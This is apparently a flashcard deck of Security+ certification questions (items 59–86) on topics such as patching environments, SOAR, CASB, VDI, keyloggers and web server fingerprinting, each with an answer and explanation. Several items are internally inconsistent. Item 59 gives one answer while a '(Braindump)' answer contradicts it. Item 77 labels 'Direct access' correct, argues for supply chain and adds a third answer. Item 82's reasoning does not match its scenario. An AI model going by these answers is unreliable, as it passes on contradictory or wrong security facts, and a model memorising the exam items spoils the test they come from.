a. Test
b. Staging
c. Development
d. Production

A

d. Production environment.

Explanation:

Production: The production environment is where the live application or software is accessed and used by end-users. Deploying patches directly to production without adequate testing in lower environments (such as test, staging, and development) can pose significant risks. These risks include introducing new issues, disrupting service availability, or causing downtime for users.

Here’s why the other options are not correct:

a. Test: The test environment is used to conduct functional testing, integration testing, and security testing of the application. Patches are typically deployed here first to verify that they do not introduce new issues or conflicts with existing functionality.

b. Staging: The staging environment closely mirrors the production environment and is used for final testing before deployment to production. Patches are deployed here to validate their effectiveness and ensure they do not cause issues when applied to the actual production environment.

c. Development: The development environment is where changes to the application are initially made and tested by developers. Patches may be developed and tested here first, but they should undergo thorough testing in higher environments (test, staging) before being deployed to production.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
59
Q

An organization is building backup server rooms in geographically diverse locations. The Chief Information Security Officer implemented a requirement on the project that states the new hardware cannot be susceptible to the same vulnerabilities in the existing server room. Which of the following should the systems engineer consider?

a. Purchasing hardware from different vendors
b. Migrating workloads to public cloud infrastructure
c. Implementing a robust patch management solution
d. Designing new detective security controls

A

d. Designing new detective security controls

Explanation:

Detective security controls: These controls are designed to detect and alert on security incidents or potential vulnerabilities in real-time or near real-time. By implementing new detective controls in the backup server rooms, the organization can enhance its ability to monitor and respond to threats effectively.

Here’s why the other options may not fully address the requirement:

a. Purchasing hardware from different vendors: While diversifying vendors can reduce the risk of vulnerabilities common to specific manufacturers, it does not guarantee protection against all vulnerabilities. Moreover, vulnerabilities can exist across different vendors depending on their product design and implementation.

b. Migrating workloads to public cloud infrastructure: While the public cloud can provide enhanced security features, it introduces new security considerations and may not directly address vulnerabilities in the organization's physical server rooms.

c. Implementing a robust patch management solution: Patch management is crucial for mitigating vulnerabilities, but it addresses vulnerabilities that are already known and for which patches are available. It does not prevent the initial exploitation of vulnerabilities or address unknown vulnerabilities.

(Braindump) a. Purchasing hardware from different vendors

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
60
Q

A security analyst is working on a project to implement a solution that monitors network communications and provides alerts when abnormal behavior is detected.
Which of the following is the security analyst MOST likely implementing?

a. Vulnerability scans
b. User behavior analysis
c. Security orchestration, automation, and response
d. Threat hunting

A

b. User behavior analysis

Explanation:

User behavior analysis: This involves monitoring and analyzing patterns of user activity across the network to detect deviations from normal behavior. The goal is to identify potential security incidents or insider threats based on unusual actions or access patterns.

Here’s why the other options are less likely:

a. Vulnerability scans: Vulnerability scans are automated processes to identify weaknesses in systems, applications, or networks. They focus on identifying known vulnerabilities rather than detecting abnormal behavior in real-time.

c. Security orchestration, automation, and response (SOAR): SOAR platforms integrate security tools and automate incident response workflows. While SOAR can include monitoring capabilities, it primarily focuses on automation and orchestration of response activities rather than detecting abnormal behavior.

d. Threat hunting: Threat hunting involves proactive and iterative searching for threats within an environment based on indicators of compromise (IoCs) and knowledge of attacker tactics, techniques, and procedures (TTPs). It is more focused on actively seeking out threats rather than monitoring for abnormal behavior passively.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
61
Q

Data exfiltration analysis indicates that an attacker managed to download system configuration notes from a web server. The web-server logs have been deleted, but analysts have determined that the system configuration notes were stored in the database administrator’s folder on the web server. Which of the following attacks explains what occurred? (Choose two.)

a. Pass-the-hash
b. Directory traversal
c. SQL injection
d. Privilege escalation
e. Cross-site scripting
f. Request forgery

A

b. Directory traversal
d. Privilege escalation

Here’s the reasoning:

Directory Traversal:
    This attack involves navigating through directories in a file system to access files and directories that are outside the web root directory. In this case, it explains how the attacker could access the database administrator's folder on the web server, which should not have been directly accessible through the web server.

Privilege Escalation:
    This attack involves gaining elevated access to resources that are normally protected from an application or user. In this scenario, the attacker may have used privilege escalation to gain the necessary permissions to access or download the system configuration notes from the database administrator's folder.

The other options are less likely to explain this specific incident:

Pass-the-hash: This is a network attack where an attacker captures a password hash and reuses it to authenticate as the user. It doesn't directly explain accessing specific files on a web server.
SQL injection: While this could be used to manipulate a database, it doesn't directly explain accessing files stored in a directory structure on the web server.
Cross-site scripting (XSS): This is a client-side attack that targets users of a web application, not the server's file system.
Request forgery: This involves tricking a user into making unwanted requests. It doesn't directly explain how the attacker accessed specific files on the web server.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
62
Q

A junior security analyst is conducting an analysis after passwords were changed on multiple accounts without users’ interaction. The SIEM have multiple login entries with the following text:

suspicious event - user: scheduledtasks successfully authenticate on AD on abnormal time suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\amazing-3rdparty-domain-assessment.py suspicious event - user: scheduledtasks failed to execute c:\weekly_checkups\secureyourAD-3rdparty-compliance.sh suspicious event - user: scheduledtasks successfully executed c:\weekly_checkups\amazing-3rdparty-domain-assessment.py

Which of the following is the MOST likely attack conducted on the environment?

a. Malicious script
b. Privilege escalation
c. Domain hijacking
d. DNS poisoning

A

a. Malicious script

Explanation:

The events indicate that a user named scheduledtasks successfully authenticated on Active Directory (AD) at abnormal times, which suggests unauthorized access or misuse of credentials associated with a scheduled task.
There are failed attempts to execute scripts (amazing-3rdparty-domain-assessment.py and secureyourAD-3rdparty-compliance.sh) from a directory (c:\weekly_checkups\), indicating attempts to run potentially malicious scripts on the system.
Finally, there is a successful execution of the amazing-3rdparty-domain-assessment.py script by the scheduledtasks user, which implies that a malicious script was successfully executed on the system.

Based on these indicators, the events point towards an attack where an unauthorized user or process (scheduledtasks) gained access to the system, likely through compromised credentials or a vulnerability, and executed malicious scripts (amazing-3rdparty-domain-assessment.py) as part of their attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
63
Q

A customer service representative reported an unusual text message that was sent to the help desk. The message contained an unrecognized invoice number with a large balance due and a link to click for more details. Which of the following BEST describes this technique?

a. Vishing
b. Whaling
c. Phishing
d. Smishing

A

d. Smishing

Explanation:

Smishing (SMS phishing) is a type of phishing attack where attackers use SMS (text messages) to deceive victims into providing sensitive information or clicking on malicious links. In this case, the text message containing an unrecognized invoice number and a link to click for more details is an attempt to trick the recipient into visiting a malicious website or downloading malware onto their device.

Phishing typically refers to email-based attacks that aim to deceive users into disclosing personal information, clicking on malicious links, or downloading attachments that contain malware.

Vishing (Voice phishing) involves attackers using voice communication (phone calls) to deceive individuals into revealing sensitive information.

Whaling targets high-profile individuals or executives within an organization, attempting to trick them into revealing sensitive information or authorizing fraudulent transactions.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
64
Q

Which of the following actions would be recommended to improve an incident response process?

a. Train the team to identify the difference between events and incidents.
b. Modify access so the IT team has full access to the compromised assets.
c. Contact the authorities if a cybercrime is suspected.
d. Restrict communication surrounding the response to the IT team.

A

a. Train the team to identify the difference between events and incidents.

Explanation:

Incident response effectiveness often hinges on the ability of the team to quickly identify and prioritize incidents from normal events. Training team members to distinguish between events (which are regular occurrences in IT operations) and incidents (which are security breaches or potential security breaches) is crucial.

This training helps in promptly identifying incidents that require immediate action, thereby reducing response times and minimizing potential damage from security breaches.

Option b, modifying access for the IT team to have full access to compromised assets, could potentially be necessary during incident response but is not a broad recommendation for improving the entire process.

Option c, contacting authorities if cybercrime is suspected, is a specific step that may be part of incident response but doesn’t encompass the whole process.

Option d, restricting communication surrounding the response to the IT team, goes against best practices of incident response, which often involve cross-functional teams and communication with various stakeholders.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
65
Q

A cybersecurity administrator needs to implement a Layer 7 security control on a network and block potential attacks. Which of the following can block an attack at Layer 7? (Choose two.)

a. HIDS
b. NIPS
c. HSM
d. WAF
e. NAC
f. NIDS

A

b. NIPS (Network-based Intrusion Prevention System)
d. WAF (Web Application Firewall)

Here’s why:

NIPS (Network-based Intrusion Prevention System):
    A NIPS can analyze network traffic and block malicious activities at various layers, including Layer 7. It can detect and prevent attacks such as SQL injection, cross-site scripting (XSS), and other web application attacks.

WAF (Web Application Firewall):
    A WAF specifically focuses on monitoring, filtering, and blocking HTTP/HTTPS traffic to and from a web application. It operates at Layer 7 and is designed to protect web applications by detecting and blocking attacks like SQL injection, XSS, and other web-based threats.

The other options do not operate at Layer 7 in a manner that allows them to block attacks:

HIDS (Host-based Intrusion Detection System): Detects suspicious activity on a specific host but does not block Layer 7 attacks.
HSM (Hardware Security Module): Manages digital keys and performs cryptographic operations, not related to blocking Layer 7 attacks.
NAC (Network Access Control): Controls access to the network but does not specifically block Layer 7 attacks.
NIDS (Network-based Intrusion Detection System): Monitors network traffic for suspicious activity but does not block attacks, and its focus is not specifically on Layer 7.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
66
Q

A business operations manager is concerned that a PC that is critical to business operations will have a costly hardware failure soon. The manager is looking for options to continue business operations without incurring large costs. Which of the following would mitigate the manager’s concerns?

a. Implement a full system upgrade.
b. Perform a physical-to-virtual migration.
c. Install uninterruptible power supplies.
d. Purchase cybersecurity insurance.

A

b. Perform a physical-to-virtual migration.

Here’s why:

Cost-Effective: Physical-to-virtual (P2V) migration allows the business to continue using the existing system by running it as a virtual machine (VM) on more reliable hardware, often without the need to purchase new physical hardware immediately.
Business Continuity: Virtual machines can be easily backed up, replicated, and moved to different hosts, ensuring business operations can continue seamlessly even if there is a hardware failure.
Scalability and Flexibility: Virtual environments can be adjusted more easily to changing business needs compared to physical hardware.

The other options are less suitable for this specific concern:

Implement a full system upgrade: This could be costly and might not be necessary if the main concern is the hardware reliability of a single PC.
Install uninterruptible power supplies (UPS): This addresses power-related issues, not hardware failures.
Purchase cybersecurity insurance: This would help mitigate financial losses due to cyber incidents but does not address the concern of hardware failure directly.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
67
Q

An organization has activated an incident response plan due to a malware outbreak on its network. The organization has brought in a forensics team that has identified an internet-facing Windows server as the likely point of initial compromise. The malware family that was detected is known to be distributed by manually logging on to servers and running the malicious code. Which of the following actions would be BEST to prevent reinfection from the infection vector?

a. Prevent connections over TFTP from the internal network.
b. Create a firewall rule that blocks a 22 from the internet to the server.
c. Disable file sharing over port 445 to the server.
d. Block port 3389 inbound from untrusted networks.

A

d. Block port 3389 inbound from untrusted networks.

The SMB Protocol (in all its version) doesn’t provide functionality to execute files at the remote systems. Its main objective is to support the sharing of file and print resource between machines.
The only feasible option left is logging through RDP and manually executing the file.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
68
Q

Which of the following uses SAML for authentication?

a. TOTP
b. Federation
c. Kerberos
d. HOTP

A

b. Federation

Explanation: Federation often uses Security Assertion Markup Language (SAML) for authentication. SAML is an open standard for exchanging authentication and authorization data between parties, particularly between an identity provider and a service provider, which is a key aspect of federated identity management.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
69
Q

The SOC for a large MSSP is meeting to discuss the lessons learned from a recent incident that took much too long to resolve. This type of incident has become more common in recent weeks and is consuming large amounts of the analysts’ time due to manual tasks being performed. Which of the following solutions should the SOC consider to BEST improve its response time?

a. Configure a NIDS appliance using a Switched Port Analyzer.
b. Collect OSINT and catalog the artifacts in a central repository.
c. Implement a SOAR with customizable playbooks.
d. Install a SIEM with community-driven threat intelligence.

A

c. Implement a SOAR with customizable playbooks.

Here’s why SOAR (Security Orchestration, Automation, and Response) with customizable playbooks is the most appropriate choice:

Automation: SOAR platforms enable automation of repetitive tasks and workflows in incident response. This can significantly reduce the time analysts spend on manual tasks such as data enrichment, response coordination, and remediation actions.

Customizable Playbooks: SOAR platforms allow organizations to create and customize playbooks tailored to their specific incident response processes and workflows. Analysts can define automated actions based on predefined conditions and responses, ensuring consistent and efficient handling of incidents.

Integration: SOAR platforms integrate with various security tools, allowing seamless communication and automated response across the security infrastructure. This integration further enhances the efficiency of incident response operations.

In contrast, let’s briefly review why the other options are less suitable:

a. Configure a NIDS appliance using a Switched Port Analyzer: While network intrusion detection systems (NIDS) are important for detecting network-based attacks, configuring them using a Switched Port Analyzer (SPAN) focuses on monitoring network traffic. This does not directly address the need for automation and response orchestration.

b. Collect OSINT and catalog the artifacts in a central repository: Open Source Intelligence (OSINT) gathering and artifact cataloging are valuable for threat intelligence and analysis, but they do not directly improve incident response time, especially in terms of automation and process efficiency.

d. Install a SIEM with community-driven threat intelligence: SIEM (Security Information and Event Management) systems are crucial for centralized logging and correlation of security events. While they provide insights into security incidents, they do not inherently automate incident response processes like a SOAR platform does.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
70
Q

Business partners are working on a security mechanism to validate transactions securely. The requirement is for one company to be responsible for deploying a trusted solution that will register and issue artifacts used to sign, encrypt, and decrypt transaction files. Which of the following is the BEST solution to adopt?

a. PKI
b. Blockchain
c. SAML
d. OAuth

A

a. PKI (Public Key Infrastructure)

Here’s why PKI is the best choice:

Secure Transaction Signing: PKI provides a robust framework for managing digital certificates and keys, which are essential for securely signing, encrypting, and decrypting transaction files.

Certificate Authority (CA): PKI involves a hierarchical system where a trusted Certificate Authority (CA) issues digital certificates that validate the identity of entities (such as business partners) and bind their public keys to their identities. This ensures the authenticity and integrity of transactions.

Encryption and Decryption: PKI supports asymmetric encryption, where entities have a public-private key pair. This allows for secure encryption of transaction data using the recipient's public key and decryption using their private key, ensuring confidentiality.

Non-repudiation: PKI enables digital signatures, which provide non-repudiation by linking the identity of the signer to the signed data, preventing the signer from later denying involvement.

In contrast, let’s briefly discuss why the other options are less suitable:

b. Blockchain: While blockchain technology provides decentralized and tamper-resistant transaction records, it is more commonly used for distributed ledger purposes rather than issuing digital certificates and managing keys for encryption.

c. SAML (Security Assertion Markup Language): SAML is primarily used for exchanging authentication and authorization data between parties, typically in web-based single sign-on (SSO) scenarios. It is not designed for managing keys or issuing certificates for transaction signing.

d. OAuth (Open Authorization): OAuth is an authorization framework that allows third-party applications to access resources without sharing credentials. It is used for access delegation rather than transaction signing and encryption.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
71
Q

A security analyst has been asked by the Chief Information Security Officer to:
-develop a secure method of providing centralized management of infrastructure
-reduce the need to constantly replace aging end user machines
-provide a consistent user desktop experience

Which of the following BEST meets these requirements?

a. BYOD
b. Mobile device management
c. VDI
d. Containerization

A

c. VDI (Virtual Desktop Infrastructure)

Here’s why VDI is the appropriate choice:

Centralized Management: VDI allows for centralized management of virtual desktops from a single location. IT administrators can manage and update virtual desktop images and applications centrally, ensuring security configurations are consistent across all virtual desktop instances.

Extend the Life of End User Machines: With VDI, end user devices (like desktops or laptops) primarily serve as thin clients, meaning they require less processing power and storage since most computing occurs on the virtual desktop server. This reduces the need for frequent hardware upgrades or replacements of end user machines.

Consistent User Desktop Experience: VDI provides a consistent desktop environment to users regardless of the device they are using to access their virtual desktop. Users can access their desktop and applications from any device with an internet connection, ensuring a uniform user experience.

On the other hand, let’s briefly discuss why the other options are less suitable:

a. BYOD (Bring Your Own Device): BYOD allows employees to use their personal devices for work purposes, but it does not inherently provide centralized management or reduce the need for replacing aging end user machines. It also may not ensure a consistent user desktop experience across different devices.

b. Mobile Device Management (MDM): MDM focuses on managing mobile devices (smartphones, tablets) used within an organization, primarily for security and policy enforcement. It does not directly address centralized management of infrastructure or provide a consistent desktop experience for users.

d. Containerization: While containerization provides a lightweight and isolated environment for running applications, it is more suitable for application deployment and microservices architecture rather than providing centralized management of infrastructure or virtual desktop environments.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
72
Q

Which of the following terms describes a broad range of information that is sensitive to a specific organization?

a. Public
b. Top secret
c. Proprietary
d. Open-source

A

c. Proprietary

Explanation:

Proprietary: This term refers to information that is owned by a company or organization and is considered confidential or sensitive. It encompasses a wide range of data and knowledge that is not publicly available or disclosed to the general public. Proprietary information can include trade secrets, intellectual property, business strategies, customer lists, financial data, and more.

Let’s briefly differentiate it from the other options:

Public: Information that is publicly accessible and not considered confidential or sensitive.
Top secret: Typically refers to the highest level of classified information in government or military contexts.
Open-source: Refers to software or information that is freely available for use, modification, and distribution under licenses that promote access and collaboration.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
73
Q

A Chief Security Officer (CSO) is concerned that cloud-based services are not adequately protected from advanced threats and malware. The CSO believes there is a high risk that a data breach could occur in the near future due to the lack of detective and preventive controls. Which of the following should be implemented to BEST address the CSO’s concerns? (Choose two.)

a. A WAF
b. A CASB
c. An NG-SWG
d. Segmentation
e. Encryption
f. Containerization

A

b. A CASB (Cloud Access Security Broker)
c. An NG-SWG (Next-Generation Secure Web Gateway)

Here’s why:

CASB (Cloud Access Security Broker):
    A CASB provides visibility and control over data and user activities in cloud services. It offers features such as threat detection, data loss prevention (DLP), and enforcement of security policies, which are crucial for protecting cloud-based services from advanced threats and data breaches.

NG-SWG (Next-Generation Secure Web Gateway):
    An NG-SWG offers advanced web security by inspecting web traffic for malware, blocking malicious websites, and providing threat intelligence. It can prevent advanced threats from reaching cloud-based services by filtering and securing web traffic.

The other options, while important for overall security, are not as directly focused on addressing the CSO’s specific concerns about advanced threats and malware in the cloud:

WAF (Web Application Firewall): Protects web applications from attacks like SQL injection and cross-site scripting, but doesn't provide comprehensive cloud service protection.
Segmentation: Enhances security by isolating network segments, but does not directly address advanced threats and malware in cloud services.
Encryption: Protects data at rest and in transit, but doesn't prevent or detect advanced threats and malware.
Containerization: Helps with application security and isolation, but isn't specifically focused on protecting cloud-based services from advanced threats and malware.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
74
Q

An organization is planning to roll out a new mobile device policy and issue each employee a new laptop. These laptops would access the users’ corporate operating system remotely and allow them to use the laptops for purposes outside of their job roles. Which of the following deployment models is being utilized?

a. MDM and application management
b. BYOD and containers
c. COPE and VDI
d. CYOD and VMs

A

c. COPE and VDI

COPE (Corporate-Owned, Personally-Enabled): In a COPE deployment model, the organization owns the laptops provided to employees. These devices are configured with corporate policies and applications, making them suitable for corporate use. However, employees are also allowed to use these devices for personal purposes within certain boundaries set by the organization.

VDI (Virtual Desktop Infrastructure): VDI allows employees to access their corporate desktop environment remotely from their laptops. This means that the laptops do not necessarily store sensitive corporate data locally but instead connect to virtualized desktops hosted on centralized servers or in the cloud. VDI ensures that employees can use their laptops securely from any location while accessing the corporate operating system and applications.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
75
Q

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:
-All users share workstations throughout the day.
-Endpoint protection was disabled on several workstations throughout the network.
-Travel times on logins from the affected users are impossible.
-Sensitive data is being uploaded to external sites.

All user account passwords were forced to be reset and the issue continued.
Which of the following attacks is being used to compromise the user accounts?

a. Brute-force
b. Keylogger
c. Dictionary
d. Rainbow

A

b. Keylogger

Keylogger: A keylogger is malicious software or hardware that records keystrokes made by a user on a compromised system. If users share workstations and a keylogger is installed on those systems, it can capture all keystrokes entered by users, including usernames, passwords, and other sensitive information. This would allow an attacker to capture newly entered passwords after resets, despite the reset attempt.

Symptoms match:

Unauthorized emails and suspicious activities: Keyloggers can capture login credentials, allowing attackers to impersonate legitimate users and perform unauthorized actions.
Endpoint protection disabled: Keyloggers can be sophisticated enough to evade detection by endpoint protection software or even disable it.
Impossible travel times: If the attacker has gained access to user accounts, they can login from different locations, making it appear as if the user is logging in from impossible travel distances.
Sensitive data uploaded to external sites: Once credentials are compromised, attackers can exfiltrate sensitive data to external locations.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
76
Q

A security forensics analyst is examining a virtual server. The analyst wants to preserve the present state of the virtual server, including memory contents. Which of the following backup types should be used?

a. Snapshot
b. Differential
c. Cloud
d. Full
e. Incremental

A

a. Snapshot

Snapshot: A snapshot captures the current state of a virtual machine (VM) at a specific point in time. This includes the contents of the VM’s memory, disk state, and configuration settings. It essentially creates a read-only copy of the VM at the time the snapshot was taken. Snapshots are useful for creating point-in-time backups and for preserving the exact state of the VM, including any volatile data in memory.

Other backup types:

Full backup: This type of backup typically copies all data from the source, but it does not specifically capture the memory state of a running virtual server.
Differential backup: This captures changes made since the last full backup, but it does not capture memory contents.
Incremental backup: This captures changes made since the last backup (full or incremental), but like differential backups, it does not include memory contents.
Cloud backup: Refers to backups stored in a cloud-based storage service; it does not describe the type of backup method used.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
77
Q

After returning from a conference, a user’s laptop has been operating slower than normal and overheating, and the fans have been running constantly. During the diagnosis process, an unknown piece of hardware is found connected to the laptop’s motherboard. Which of the following attack vectors was exploited to install the hardware?

a. Removable media
b. Spear phishing
c. Supply chain
d. Direct access

A

(Brindump Community ) d. Direct access

c. Supply chain attack: This type of attack involves manipulating or exploiting vulnerabilities in the supply chain of hardware or software components. In this case, the user’s laptop could have been compromised when it was serviced, repaired, or accessed during the conference. An attacker might have physically inserted a malicious hardware device (such as a hardware keylogger, a malicious network adapter, or a rogue USB device) into the laptop to monitor or control its operations. This hardware can cause symptoms like overheating, increased fan activity, and degraded performance.

Other options:

Removable media: Typically refers to attacks through USB drives or external storage devices. While it's possible for malware to spread through such media, it doesn't directly explain the presence of a physically attached unknown hardware device.
Spear phishing: Involves targeted email attacks to deceive users into disclosing sensitive information or downloading malware. This doesn't directly relate to the physical compromise described.
Direct access: Refers to physical access to a system or device. While the attacker did gain physical access, the specific method of compromise involves the manipulation of the supply chain, not just direct physical access alone.

(Braindump)
a. Removable media

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
78
Q

After a recent security breach, a security analyst reports that several administrative usernames and passwords are being sent via cleartext across the network to access network devices over port 23. Which of the following should be implemented so all credentials sent over the network are encrypted when remotely accessing and configuring network devices?

a. SSH
b. SNMPv3
c. SFTP
d. Telnet
e. FTP

A

a. SSH (Secure Shell)

Here’s why SSH is the correct choice:

SSH (Secure Shell): SSH provides a secure, encrypted method for remote login and command execution on network devices. It encrypts the entire communication session between the client and the server, including authentication credentials, commands sent, and responses received. This encryption ensures that passwords and other sensitive information are protected from eavesdropping and interception.

Other options explained:
    SNMPv3: SNMPv3 provides authentication and encryption for SNMP (Simple Network Management Protocol) messages, but it's primarily used for monitoring and management rather than interactive command execution like SSH.
    SFTP (Secure File Transfer Protocol): SFTP is used for secure file transfers, not for interactive command-line access to network devices.
    Telnet: Telnet is a legacy protocol that sends data, including passwords, in cleartext. It does not provide any encryption or security mechanisms, making it vulnerable to interception.
    FTP (File Transfer Protocol): FTP also sends data, including credentials, in cleartext. It does not provide encryption for data in transit.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
79
Q

Which of the following provides a calculated value for known vulnerabilities so organizations can prioritize mitigation steps?

a. CVSS
b. SIEM
c. SOAR
d. CVE

A

a. CVSS (Common Vulnerability Scoring System)

CVSS is a standard for assessing and scoring the severity of computer system security vulnerabilities. It provides a quantitative measure of the impact and exploitability of a vulnerability, allowing organizations to prioritize their response efforts. CVSS assigns a score based on several metrics such as exploitability, impact, and complexity, which helps organizations determine the urgency and criticality of applying patches or mitigations to vulnerabilities.

Let’s briefly explain the other options for clarity:

SIEM (Security Information and Event Management): SIEM systems aggregate and analyze security event data from various sources within an organization's IT infrastructure. They provide real-time analysis of security alerts generated by applications and network hardware, helping organizations to detect and respond to security incidents.

SOAR (Security Orchestration, Automation, and Response): SOAR platforms integrate security technologies and automate incident response processes. They can help streamline and accelerate incident detection, response, and remediation tasks.

CVE (Common Vulnerabilities and Exposures): CVE is a dictionary of publicly known information security vulnerabilities and exposures. It provides unique identifiers (CVE IDs) for known vulnerabilities, but it does not provide a calculated value or scoring system for prioritization.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
80
Q

Several universities are participating in a collaborative research project and need to share compute and storage resources. Which of the following cloud deployment strategies would BEST meet this need?

a. Community
b. Private
c. Public
d. Hybrid

A

a. Community

Explanation:

Community cloud deployment model is designed to meet the specific needs of a community of organizations with shared concerns (such as universities collaborating on research projects).
It allows these organizations to share infrastructure and resources securely while maintaining some level of control over their data and applications.
This model supports collaborative efforts by providing a dedicated and customizable environment that meets the shared requirements of the participating universities.
It typically offers better security, compliance, and performance compared to public cloud options, while still providing the benefits of scalability and cost-efficiency.

In contrast:

Public cloud involves resources shared by multiple organizations over the internet, which may not offer the required level of control or security for sensitive research data.
Private cloud is dedicated to a single organization, which may not be cost-effective or scalable for multiple universities collaborating on a project.
Hybrid cloud integrates private and public cloud environments, which could add unnecessary complexity for this specific collaborative research scenario.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
81
Q

A forensic analyst needs to prove that data has not been tampered with since it was collected. Which of the following methods will the analyst MOST likely use?

a. Look for tampering on the evidence collection bag.
b. Encrypt the collected data using asymmetric encryption.
c. Ensure proper procedures for chain of custody are being followed.
d. Calculate the checksum using a hashing algorithm.

A

d. Calculate the checksum using a hashing algorithm.

Explanation:

Checksum using a hashing algorithm (option d) is commonly used in forensic analysis to verify data integrity. A hash function takes an input (in this case, the collected data) and produces a fixed-size string of bytes, known as the hash value or checksum.
If the data remains unchanged, the hash value will remain the same.
Even a small change to the input data will result in a significantly different hash value due to the avalanche effect of hash functions.
By comparing the hash value of the collected data to the hash value calculated later, the forensic analyst can verify if the data has been tampered with.
This method is efficient, reliable, and widely accepted in forensic investigations to ensure data integrity and prove the authenticity of collected evidence.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
82
Q

Multiple business accounts were compromised a few days after a public website had its credentials database leaked on the Internet. No business emails were identified in the breach, but the security team thinks that the list of passwords exposed was later used to compromise business accounts. Which of the following would mitigate the issue?

a. Complexity requirements
b. Password history
c. Acceptable use policy
d. Shared accounts

A

b. Password history

Explanation:

Implementing password history policies ensures that users cannot reuse a certain number of their previous passwords. This can help mitigate the risk of attackers using previously leaked passwords to gain access to accounts. Complexity requirements alone (option a) do not address the issue if users reuse old passwords that have already been compromised. Acceptable use policy (option c) and shared accounts (option d) are not directly relevant to preventing the reuse of compromised

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
83
Q

A security analyst wants to fingerprint a web server. Which of the following tools will the security analyst MOST likely use to accomplish this task?

a. nmap -pl-65535 192.168.0.10
b. dig 192.168.0.10
c. curl –head http://192.168.0.10
d. ping 192.168.0.10

A

c. curl –head http://192.168.0.10

a. nmap -pl-65535 192.168.0.10: This command uses nmap, a network scanning tool. However, the options -pl-65535 are incorrect and would not achieve web server fingerprinting. This command is typically used for ping scanning, not for web server fingerprinting.

b. dig 192.168.0.10: The dig command is used for querying DNS (Domain Name System) servers to retrieve DNS records like A, AAAA, and others. It does not provide information about the web server itself.

c. curl –head http://192.168.0.10: This command uses curl to make an HTTP request to the specified URL (http://192.168.0.10) and retrieves the HTTP headers (–head). HTTP headers often include server information such as the server type and sometimes version number. This can help in fingerprinting the web server.

d. ping 192.168.0.10: The ping command is used to test connectivity between devices by sending ICMP echo requests. It does not provide any information about the web server software.

Conclusion: The most appropriate tool from the options provided to fingerprint a web server is c. curl –head http://192.168.0.10. This command will fetch the HTTP headers from the web server at 192.168.0.10, allowing the security analyst to gather information about the server software and version, which is crucial for fingerprinting purposes. Therefore, option c is the correct answer.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
84
Q

A penetration tester was able to compromise an internal server and is now trying to pivot the current session in a network lateral movement. Which of the following tools, if available on the server, will provide the MOST useful information for the next assessment step?

a. Autopsy
b. Cuckoo
c. Memdump
d. Nmap

A

d. Nmap

a. Autopsy: Autopsy is a digital forensics platform primarily used for analyzing disk images and other media. It is not suitable for network enumeration or scanning.

b. Cuckoo: Cuckoo is a malware analysis sandbox. While useful for analyzing malware behavior and payloads, it is not typically used for network scanning or enumeration.

c. Memdump: Memdump typically refers to dumping memory contents for analysis. While memory analysis can be useful, it’s not directly related to network enumeration or lateral movement within a network.

d. Nmap: Nmap is a powerful network scanning tool that can be used to discover hosts, services, and open ports on a network. It is highly effective for mapping out network topologies, identifying live hosts, and providing information about services running on those hosts.

Conclusion: In the context of pivoting from a compromised server for lateral movement, d. Nmap would provide the most useful information. Nmap can scan the network from the compromised server, identify other hosts and services, and potentially uncover additional vulnerabilities or targets for further exploitation. Therefore, option d. Nmap is the correct answer for the penetration tester in this scenario.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
85
Q

Field workers in an organization are issued mobile phones on a daily basis. All the work is performed within one city, and the mobile phones are not used for any purpose other than work. The organization does not want these phones used for personal purposes. The organization would like to issue the phones to workers as permanent devices so the phones do not need to be reissued every day. Given the conditions described, which of the following technologies would BEST meet these requirements?

a. Geofencing
b. Mobile device management
c. Containerization
d. Remote wiping

A

b. Mobile device management (MDM)

Here’s how MDM addresses the organization’s needs:

Issuing Permanent Devices: MDM solutions allow organizations to manage mobile devices centrally. This includes provisioning devices and configuring them with the necessary settings and applications. Once configured, the devices can be issued as permanent work devices to field workers, eliminating the need for daily reissuance.

Enforcement of Policies: MDM solutions enable organizations to enforce strict policies on managed devices. This includes configuring devices so they can only be used for work purposes and preventing unauthorized use for personal activities. Policies can restrict the installation of non-work-related apps and enforce usage restrictions.

Security and Compliance: MDM provides security features such as encryption, remote locking, and password policies to protect sensitive work data on the devices. It also helps ensure compliance with organizational policies and regulatory requirements.

Remote Management and Monitoring: MDM allows IT administrators to remotely monitor and manage devices. This includes tracking device location (geolocation) and status, applying updates and patches, and troubleshooting issues without physical access to the devices.

While geofencing (option a) can restrict device usage based on location, it typically does not provide comprehensive management capabilities like policy enforcement and remote management, which are crucial for maintaining control over devices used by field workers. Containerization (option c) is useful for separating work and personal data on devices, but it may not prevent personal use entirely unless strictly enforced through policy. Remote wiping (option d) is a security measure to erase data from lost or stolen devices but does not address the management and usage policy requirements described.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
86
Q

Which of the following control types is focused primarily on reducing risk before an incident occurs?

a. Preventive
b. Deterrent
c. Corrective
d. Detective

A

a. Preventive

Preventive controls are designed to prevent incidents from occurring by reducing vulnerabilities or deterring potential attackers. They aim to proactively mitigate risks before they can be exploited. Examples of preventive controls include:

Access controls: Limiting access to authorized personnel only.
Encryption: Protecting sensitive data from unauthorized access.
Patching and updates: Keeping software and systems up to date to address known vulnerabilities.
